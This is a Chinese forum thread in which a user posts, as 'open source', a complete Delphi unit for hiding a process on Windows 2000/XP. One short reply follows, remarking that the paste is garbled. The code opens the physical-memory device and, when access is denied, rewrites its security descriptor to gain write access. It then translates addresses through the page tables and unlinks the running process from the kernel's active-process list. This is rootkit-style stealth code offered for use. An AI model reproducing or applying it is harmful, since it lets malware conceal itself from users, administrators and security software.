阿杰 发表于 2009-7-24 21:29:36

【开源】隐藏进程代码DELPHI版

<p>unit HideProcess;<br/><br/>interface<br/><br/>function MyHideProcess: Boolean;<br/><br/>implementation<br/><br/>uses<br/>&nbsp;&nbsp; Windows,<br/>&nbsp;&nbsp;&nbsp; Classes, AclAPI, accCtrl;<br/><br/>type<br/>&nbsp;&nbsp; NTSTATUS = LongInt;<br/><br/>const<br/>&nbsp;&nbsp; //NT_SUCCESS(Status) ((NTSTATUS)(Status) &gt;= 0)<br/>&nbsp;&nbsp; STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);<br/>&nbsp;&nbsp; STATUS_ACCESS_DENIED = NTSTATUS($C0000022);<br/>&nbsp;&nbsp; OBJ_INHERIT = $00000002;<br/>&nbsp;&nbsp; OBJ_PERMANENT = $00000010;<br/>&nbsp;&nbsp; OBJ_EXCLUSIVE = $00000020;<br/>&nbsp;&nbsp; OBJ_CASE_INSENSITIVE = $00000040;<br/>&nbsp;&nbsp; OBJ_OPENIF = $00000080;<br/>&nbsp;&nbsp; OBJ_OPENLINK = $00000100;<br/>&nbsp;&nbsp; OBJ_KERNEL_HANDLE = $00000200;<br/>&nbsp;&nbsp; OBJ_VALID_ATTRIBUTES = $000003F2;<br/><br/>type<br/>&nbsp;&nbsp; PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;<br/>&nbsp;&nbsp; IO_STATUS_BLOCK = record<br/>&nbsp;&nbsp;&nbsp;&nbsp; Status: NTSTATUS;<br/>&nbsp;&nbsp;&nbsp;&nbsp; FObject: DWORD;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; PUNICODE_STRING = ^UNICODE_STRING;<br/>&nbsp;&nbsp; UNICODE_STRING = record<br/>&nbsp;&nbsp;&nbsp;&nbsp; Length: Word;<br/>&nbsp;&nbsp;&nbsp;&nbsp; MaximumLength: Word;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Buffer: PWideChar;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;<br/>&nbsp;&nbsp; OBJECT_ATTRIBUTES = record<br/>&nbsp;&nbsp;&nbsp;&nbsp; Length: DWORD;<br/>&nbsp;&nbsp;&nbsp;&nbsp; RootDirectory: Pointer;<br/>&nbsp;&nbsp;&nbsp;&nbsp; ObjectName: PUNICODE_STRING;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Attributes: DWORD;<br/>&nbsp;&nbsp;&nbsp;&nbsp; SecurityDescriptor: Pointer;<br/>&nbsp;&nbsp;&nbsp;&nbsp; SecurityQualityOfService: Pointer;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; TZwOpenSection = function(SectionHandle: PHandle;<br/>&nbsp;&nbsp;&nbsp;&nbsp; DesiredAccess: ACCESS_MASK;<br/>&nbsp;&nbsp;&nbsp;&nbsp; ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;<br/>&nbsp;&nbsp; TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;<br/>&nbsp;&nbsp;&nbsp;&nbsp; SourceString: PWideChar); stdcall;<br/><br/>var<br/>&nbsp;&nbsp; RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;<br/>&nbsp;&nbsp; ZwOpenSection: TZwOpenSection = nil;<br/>&nbsp;&nbsp; g_hNtDLL: THandle = 0;<br/>&nbsp;&nbsp; g_pMapPhysicalMemory: Pointer = nil;<br/>&nbsp;&nbsp; g_hMPM: THandle = 0;<br/>&nbsp;&nbsp; g_hMPM2: THandle = 0;<br/>&nbsp;&nbsp; g_osvi: OSVERSIONINFO;<br/>&nbsp;&nbsp; b_hide: Boolean = false;<br/>//---------------------------------------------------------------------------<br/><br/>function InitNTDLL: Boolean;<br/>begin<br/>&nbsp;&nbsp; g_hNtDLL := LoadLibrary('ntdll.dll');<br/><br/>&nbsp;&nbsp; if 0 = g_hNtDLL then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := false;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');<br/>&nbsp;&nbsp; ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');<br/><br/>&nbsp;&nbsp; Result := True;<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>procedure CloseNTDLL;<br/>begin<br/>&nbsp;&nbsp; if (0 &lt;&gt; g_hNtDLL) then<br/>&nbsp;&nbsp;&nbsp;&nbsp; FreeLibrary(g_hNtDLL);<br/>&nbsp;&nbsp; g_hNtDLL := 0;<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);<br/>var<br/>&nbsp;&nbsp; pDacl: PACL;<br/>&nbsp;&nbsp; pSD: PPSECURITY_DESCRIPTOR;<br/>&nbsp;&nbsp; pNewDacl: PACL;<br/>&nbsp;&nbsp; dwRes: DWORD;<br/>&nbsp;&nbsp; ea: EXPLICIT_ACCESS;<br/>begin<br/>&nbsp;&nbsp; pDacl := nil;<br/>&nbsp;&nbsp; pSD := nil;<br/>&nbsp;&nbsp; pNewDacl := nil;<br/><br/>&nbsp;&nbsp; dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);<br/><br/>&nbsp;&nbsp; if ERROR_SUCCESS &lt;&gt; dwRes then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; if Assigned(pSD) then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LocalFree(Hlocal(pSD^));<br/>&nbsp;&nbsp;&nbsp;&nbsp; if Assigned(pNewDacl) then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LocalFree(HLocal(pNewDacl));<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));<br/>&nbsp;&nbsp; ea.grfAccessPermissions := SECTION_MAP_WRITE;<br/>&nbsp;&nbsp; ea.grfAccessMode := GRANT_ACCESS;<br/>&nbsp;&nbsp; ea.grfInheritance := NO_INHERITANCE;<br/>&nbsp;&nbsp; ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;<br/>&nbsp;&nbsp; ea.Trustee.TrusteeType := TRUSTEE_IS_USER;<br/>&nbsp;&nbsp; ea.Trustee.ptstrName := 'CURRENT_USER';<br/><br/>&nbsp;&nbsp; dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);<br/><br/>&nbsp;&nbsp; if ERROR_SUCCESS &lt;&gt; dwRes then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; if Assigned(pSD) then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LocalFree(Hlocal(pSD^));<br/>&nbsp;&nbsp;&nbsp;&nbsp; if Assigned(pNewDacl) then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LocalFree(HLocal(pNewDacl));<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; dwRes := SetSecurityInfo<br/><br/>&nbsp;&nbsp; (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);<br/><br/>&nbsp;&nbsp; if ERROR_SUCCESS &lt;&gt; dwRes then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; if Assigned(pSD) then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LocalFree(Hlocal(pSD^));<br/>&nbsp;&nbsp;&nbsp;&nbsp; if Assigned(pNewDacl) then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LocalFree(HLocal(pNewDacl));<br/>&nbsp;&nbsp; end;<br/><br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>function OpenPhysicalMemory: THandle;<br/>var<br/>&nbsp;&nbsp; status: NTSTATUS;<br/>&nbsp;&nbsp; physmemString: UNICODE_STRING;<br/>&nbsp;&nbsp; attributes: OBJECT_ATTRIBUTES;<br/>&nbsp;&nbsp; PhyDirectory: DWORD;<br/>begin<br/>&nbsp;&nbsp; g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);<br/>&nbsp;&nbsp; GetVersionEx(g_osvi);<br/><br/>&nbsp;&nbsp; if (5 &lt;&gt; g_osvi.dwMajorVersion) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; case g_osvi.dwMinorVersion of<br/>&nbsp;&nbsp;&nbsp;&nbsp; 0: PhyDirectory := $30000;<br/>&nbsp;&nbsp;&nbsp;&nbsp; 1: PhyDirectory := $39000;<br/>&nbsp;&nbsp; else<br/>&nbsp;&nbsp;&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Result := 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp;&nbsp;&nbsp; end;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');<br/><br/>&nbsp;&nbsp; attributes.Length := SizeOf(OBJECT_ATTRIBUTES);<br/>&nbsp;&nbsp; attributes.RootDirectory := nil;<br/>&nbsp;&nbsp; attributes.ObjectName := @physmemString;<br/>&nbsp;&nbsp; attributes.Attributes := 0;<br/>&nbsp;&nbsp; attributes.SecurityDescriptor := nil;<br/>&nbsp;&nbsp; attributes.SecurityQualityOfService := nil;<br/><br/>&nbsp;&nbsp; status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);<br/><br/>&nbsp;&nbsp; if (status = STATUS_ACCESS_DENIED) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);<br/>&nbsp;&nbsp;&nbsp;&nbsp; SetPhyscialMemorySectionCanBeWrited(g_hMPM);<br/>&nbsp;&nbsp;&nbsp;&nbsp; CloseHandle(g_hMPM);<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp; status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; if not (LongInt(status) &gt;= 0) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,<br/>&nbsp;&nbsp;&nbsp;&nbsp; FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);<br/><br/>&nbsp;&nbsp; if (g_pMapPhysicalMemory = nil) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; Result := g_hMPM;<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;<br/>var<br/>&nbsp;&nbsp; VAddr, PGDE, PTE, PAddr, tmp: DWORD;<br/>begin<br/>&nbsp;&nbsp; VAddr := DWORD(addr);<br/>//&nbsp;&nbsp; PGDE := BaseAddress;<br/>&nbsp;&nbsp; PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // modify by dot.<br/><br/>&nbsp;&nbsp; if 0 = (PGDE and 1) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := nil;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; tmp := PGDE and $00000080;<br/><br/>&nbsp;&nbsp; if (0 &lt;&gt; tmp) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);<br/>&nbsp;&nbsp; end<br/>&nbsp;&nbsp; else<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));<br/>//&nbsp;&nbsp;&nbsp;&nbsp; PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];<br/>&nbsp;&nbsp;&nbsp;&nbsp; PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // modify by dot.<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp; if (0 = (PTE and 1)) then<br/>&nbsp;&nbsp;&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Result := nil;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp;&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp; PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);<br/>&nbsp;&nbsp;&nbsp;&nbsp; UnmapViewOfFile(Pointer(PGDE));<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; Result := Pointer(PAddr);<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>function GetData(addr: Pointer): DWORD;<br/>var<br/>&nbsp;&nbsp; phys, ret: DWORD;<br/>&nbsp;&nbsp; tmp: PDWORD;<br/>begin<br/>&nbsp;&nbsp; phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));<br/>&nbsp;&nbsp; tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,<br/>&nbsp;&nbsp;&nbsp;&nbsp; phys and $FFFFF000, $1000));<br/><br/>&nbsp;&nbsp; if (nil = tmp) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp; end;<br/><br/>//&nbsp;&nbsp; ret := tmp[(phys and $FFF) shr 2];<br/>&nbsp;&nbsp; ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // modify by dot.<br/>&nbsp;&nbsp; UnmapViewOfFile(tmp);<br/><br/>&nbsp;&nbsp; Result := ret;<br/>end;<br/>//---------------------------------------------------------------------------<br/><br/>function SetData(addr: Pointer; data: DWORD): Boolean;<br/>var<br/>&nbsp;&nbsp; phys: DWORD;<br/>&nbsp;&nbsp; tmp: PDWORD;<br/>begin<br/>&nbsp;&nbsp; phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));<br/>&nbsp;&nbsp; tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));<br/><br/>&nbsp;&nbsp; if (nil = tmp) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := false;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp; end;<br/><br/>//&nbsp;&nbsp; tmp[(phys and $FFF) shr 2] := data;<br/>&nbsp;&nbsp; PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // modify by dot.<br/>&nbsp;&nbsp; UnmapViewOfFile(tmp);<br/><br/>&nbsp;&nbsp; Result := TRUE;<br/>end;<br/>//---------------------------------------------------------------------------<br/>{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)<br/>begin<br/>ExitProcess(0);<br/>return 1 ;<br/>end }<br/>//---------------------------------------------------------------------------<br/><br/>function YHideProcess: Boolean;<br/>var<br/>&nbsp;&nbsp; thread, process: DWORD;<br/>&nbsp;&nbsp; fw, bw: DWORD;<br/>begin<br/>//&nbsp;&nbsp; SetUnhandledExceptionFilter(exeception);<br/>&nbsp;&nbsp; if (FALSE = InitNTDLL) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := FALSE;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; if (0 = OpenPhysicalMemory) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := FALSE;<br/>&nbsp;&nbsp;&nbsp;&nbsp; Exit;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; thread := GetData(Pointer($FFDFF124)); //kteb<br/>&nbsp;&nbsp; process := GetData(Pointer(thread + $44)); //kpeb<br/><br/>&nbsp;&nbsp; if (0 = g_osvi.dwMinorVersion) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; fw := GetData(Pointer(process + $A0));<br/>&nbsp;&nbsp;&nbsp;&nbsp; bw := GetData(Pointer(process + $A4));<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp; SetData(Pointer(fw + 4), bw);<br/>&nbsp;&nbsp;&nbsp;&nbsp; SetData(Pointer(bw), fw);<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := TRUE;<br/>&nbsp;&nbsp; end<br/>&nbsp;&nbsp; else if (1 = g_osvi.dwMinorVersion) then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; fw := GetData(Pointer(process + $88));<br/>&nbsp;&nbsp;&nbsp;&nbsp; bw := GetData(Pointer(process + $8C));<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp; SetData(Pointer(fw + 4), bw);<br/>&nbsp;&nbsp;&nbsp;&nbsp; SetData(Pointer(bw), fw);<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := TRUE;<br/>&nbsp;&nbsp; end<br/>&nbsp;&nbsp; else<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; Result := False;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; CloseHandle(g_hMPM);<br/>&nbsp;&nbsp; CloseNTDLL;<br/>end;<br/><br/>function MyHideProcess: Boolean;<br/>begin<br/>&nbsp;&nbsp; if not b_hide then<br/>&nbsp;&nbsp; begin<br/>&nbsp;&nbsp;&nbsp;&nbsp; b_hide := YHideProcess;<br/>&nbsp;&nbsp; end;<br/><br/>&nbsp;&nbsp; Result := b_hide;<br/>end;<br/><br/>end.</p>

upring 发表于 2015-6-4 13:31:20

贴纸乱码了
页: [1]
查看完整版本: 【开源】隐藏进程代码DELPHI版